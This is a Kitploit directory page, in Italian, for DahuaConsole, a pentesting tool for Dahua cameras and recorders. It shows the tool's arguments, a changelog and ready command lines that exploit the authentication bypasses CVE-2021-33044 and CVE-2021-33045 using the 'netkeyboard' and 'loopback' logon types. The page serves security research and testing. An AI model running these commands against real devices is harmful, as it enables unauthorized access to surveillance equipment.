Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DahuaConsole — Dahua Console, accedi alla console di debug interna e/o ad altre funzioni oggetto di ricerca nei dispositivi Dahua. Sentiti libero di contribuire a questo progetto. | Kitploit
Strumenti/GitHubGitHub/mcw0/dahuaconsole
Autenticazione e AutorizzazioneSicurezza Sistemi EmbeddedRicognizioneSicurezza IoTAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration Testing
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, accedi alla console di debug interna e/o ad altre funzioni oggetto di ricerca nei dispositivi Dahua. Sentiti libero di contribuire a questo progetto.

31679261 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Dahua Console

  • Versione: Pre-alpha
  • Bug: Eccome
  • TODO: Un sacco di cose

[Installa i requisiti]

sudo pip3 install -r requirements.txt

[Argomenti]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Rilascio]

[Aggiornamento] 2022-07-10

  • Aggiunto il metodo di logon 3des_old per VTH1510CH che esegue il software V2 del 2016
    • Differenza minore nei dati del pacchetto di login
    • Non interrogare i parametri del dispositivo alla connessione - la connessione verrà resettata
  • Aggiunto --restore config-file.json
    • Carica il file di configurazione JSON o parti di esso.

Esempio:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[Aggiornamento] 2021-10-07

Dettagli qui: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocollo necessario: DHIP o HTTP/HTTPS (DHIP non funziona con TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocollo necessario: DHIP (DHIP non funziona con TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Scarica lo strumento